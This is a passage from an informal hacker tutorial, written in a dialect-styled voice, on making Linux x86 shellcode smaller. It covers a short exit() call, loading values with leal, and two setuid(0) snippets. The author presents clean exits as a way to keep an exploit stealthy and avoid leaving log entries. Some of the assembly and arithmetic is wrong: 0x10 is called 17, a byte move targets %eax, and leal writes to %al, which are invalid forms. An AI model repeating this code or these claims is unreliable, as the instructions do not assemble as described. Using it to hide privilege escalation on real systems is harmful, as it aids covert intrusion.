Now, we have a 3 byte exit function, where as before it was 5 bytes. However, dere is a catch, what if a syscall does return 0? Well in de odd situation in which that could happen, you could do many different thin’s, like inc %eax, dec %eax, not %eax anythin’ that will make %eax non-zero. Some people say that exit’s are not important in shellcode, because your code gets executed regardless of wheder or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, de exit() isn’t worth keepin’. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rader odd error, and will be logged by de system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can’t wipe all de logs, at least this part of your presence will be clear.

Unlockin’ de power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0×10(%ecx),%eax

This will load de value 17 into eax, and clear all of de extraneous bits of eax. This occurs because de leal instruction loads a variable of de type lon’ into it’s desitination operand. In it’s normal usage, this would load de address of a variable into a register, thus creatin’ a pointer of sorts. However, since ecx is 0′d and 0+17=17, we load de value 17 into eax instead of any kind of actual address. In a normal shellcode we would do somethin’ like this, to accomplish de same thin’:

xorl %eax,%eax
movb $0×10,%eax

I can hear you sayin’, but that shellcode is a byte shorter than de leal one, and you’re quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any oder register), so de xorl instruction in de leal shellcode isn’t counted. Here’s an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0×17,%al
int $0×80

xorl %ebx,%ebx
leal 0×17(%ebx),%al
int $0×80

Both of dese shellcodes call setuid(0), but one does it in 7 bytes while de oder does it in 8. Again, I hear you sayin’ but that’s only one byte it doesn’t make that much of a difference, and you’re right, here it doesn’t make much of a difference(except for in shellcode-size pissin’ contests =p), but when applied to much larger shellcodes, which have many function calls and need to do thin’s like this frequently, it can save quite a bit of space.

Conclusion

I hope you all learned somethin’, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented de leal technique, please tell me and I will credit him/her.